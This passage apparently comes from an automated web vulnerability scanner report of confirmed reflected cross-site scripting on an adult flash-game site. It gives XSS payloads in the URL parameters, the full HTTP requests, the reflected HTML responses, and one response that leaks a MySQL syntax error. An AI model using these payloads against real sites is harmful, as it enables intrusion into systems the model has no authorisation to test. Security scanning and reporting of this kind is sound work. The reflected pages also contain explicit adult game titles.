/><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">Best games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Denise Milani" title="Denise Milani"><img src="imago/denise.jpg" class = "game" width="157" height="112" ><span class = "def">Denise Milani</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Diva Mizuki Hawaiian" title="Diva Mizuki Hawaiian"><img src="imago/diva_mizuki_hawaii_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Diva Mizuki Hawaiian</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=The Agency" title="The Agency"><img src="imago/theagency.jpg" class = "game" width="157" height="112" ><span class = "def">The Agency</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Franks Adventure 4" title="Franks Adventure 4"><img src="imago/frank4_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Franks Adventure 4</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=MNF: Subway Story" title="MNF: Subway Story"><img src="imago/mnf_subway_story.jpg" class = "game" width="157" height="112" ><span class = "def">MNF: Subway Story</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Motoko vs Batou" title="Motoko vs Batou"><img src="imago/motoko_batou_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Motoko vs Batou</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kristal Full" title="Kristal Full"><img src="imago/kristal.jpg" class = "game" width="157" height="112" ><span class = "def">Kristal Full</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Quick Fuck: Double Take" title="Quick Fuck: Double Take"><img src="imago/doubletake.jpg" class = "game" width="157" height="112" ><span class = "def">Quick Fuck: Double Take</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Rob the unfaithful" title="Rob the unfaithful"><img src="imago/rtu.jpg" class = "game" width="157" height="112" ><span class = "def">Rob the unfaithful</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Thorne" title="Thorne"><img src="imago/thorne.jpg" class = "game" width="157" height="112" ><span class = "def">Thorne</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Zoe and Vince" title="Zoe and Vince"><img src="imago/zoeandvince.jpg" class = "game" width="157" height="112" ><span class = "def">Zoe and Vince</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Treesome Fun" title="Treesome Fun"><img src="imago/threesome_fun_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Treesome Fun</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Dance School" title="Dance School"><img src="imago/dance-school_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Dance School</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Lesbian Ride" title="Meet`N`Fuck Lesbian Ride"><img src="imago/mnflr.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Lesbian Ride</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500 stories" title="Jordan 500 stories"><img src="imago/j500stories.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500 stories</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Lesbian Fashion" title="Lesbian Fashion"><img src="imago/lesbianfashion.jpg" class = "game" width="157" height="112" ><span class = "def">Lesbian Fashion</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Dirty pictures" title="Dirty pictures"><img src="imago/dirty.jpg" class = "game" width="157" height="112" ><span class = "def">Dirty pictures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Afternoon 3" title="Horny Afternoon 3"><img src="imago/hornyafternoon3_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Afternoon 3</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sexy Strip Poker" title="Sexy Strip Poker"><img src="imago/strippoker.jpg" class = "game" width="157" height="112" ><span class = "def">Sexy Strip Poker</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >3</a> &nbsp; <a href="?offset=60&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >4</a> &nbsp; <a href="?offset=80&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >5</a> &nbsp; <a href="?offset=100&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >6</a> &nbsp; <a href="?offset=120&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >7</a> &nbsp; <a href="?offset=140&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>" >8</a> &nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x00019F)</script>"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_dev.php

/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x0001A1)</script>
category GET mnf

Request

GET /games_dev.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A1)%3C/script%3E&category=mnf HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2598
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - mnf erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">Meet and Fuck games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=MNF - Street Racer" title="MNF - Street Racer"><img src="imago/games_mnfstreet.jpg" class = "game" width="157" height="112" ><span class = "def">MNF - Street Racer</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Find and Fuck Adele" title="Find and Fuck Adele"><img src="imago/game_adelle.jpg" class = "game" width="157" height="112" ><span class = "def">Find and Fuck Adele</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A1)</script>&category=mnf"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A1)</script>&category=mnf" >1</a> &nbsp; <strong>2</strong>&nbsp; </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
offset GET '"--></style></script><script>alert(0x0001A2)</script>
id GET 3
category GET 3

Request

GET /games_new.php?offset='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A2)%3C/script%3E&id=3&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 174
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x0001A2)</script>,20' at line 1
- /games_dev.php

/games_dev.php CONFIRMED

http://www.lessonofpassion.com/games_dev.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x0001A3)</script>

Request

GET /games_dev.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A3)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_dev.php?type=category&category=mnf
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2211
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x0001A3)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big"> games</div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x0001A3)</script>"><strong>PREVIOUS</strong></a> &nbsp; </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..

Parameters

Parameter Type Value
offset GET 20
id GET '"--></style></script><script>alert(0x0001A4)</script>
category GET 3

Request

GET /games_new.php?offset=20&id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A4)%3C/script%3E&category=3 HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3223
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - 3 erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">New games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Orihime Music" title="Orihime Music"><img src="imago/orihime.jpg" class = "game" width="157" height="112" ><span class = "def">Orihime Music</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Flame of the lust" title="Flame of the lust"><img src="imago/fotl.jpg" class = "game" width="157" height="112" ><span class = "def">Flame of the lust</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Detective Dick" title="Detective Dick"><img src="imago/dd.jpg" class = "game" width="157" height="112" ><span class = "def">Detective Dick</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kikis Tittes" title="Kikis Tittes"><img src="imago/kiki.jpg" class = "game" width="157" height="112" ><span class = "def">Kikis Tittes</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kim Possible Blowjob" title="Kim Possible Blowjob"><img src="imago/kimbj.jpg" class = "game" width="157" height="112" ><span class = "def">Kim Possible Blowjob</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG: Swim team" title="Seductive RPG: Swim team"><img src="imago/srpg-st.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG: Swim team</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Venona Project: Episode 1" title="Venona Project: Episode 1"><img src="imago/venona.jpg" class = "game" width="157" height="112" ><span class = "def">Venona Project: Episode 1</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Poker with Nicole" title="Poker with Nicole"><img src="imago/pokernikole.jpg" class = "game" width="157" height="112" ><span class = "def">Poker with Nicole</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG" title="Seductive RPG"><img src="imago/sedrpg.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500: HCC" title="Jordan 500: HCC"><img src="imago/j500.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500: HCC</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High school romance" title="High school romance"><img src="imago/highschoolromance.jpg" class = "game" width="157" height="112" ><span class = "def">High school romance</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sweet neighbor" title="Sweet neighbor"><img src="imago/sweetneighbour.jpg" class = "game" width="157" height="112" ><span class = "def">Sweet neighbor</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny teacher" title="Horny teacher"><img src="imago/hornyteacher.jpg" class = "game" 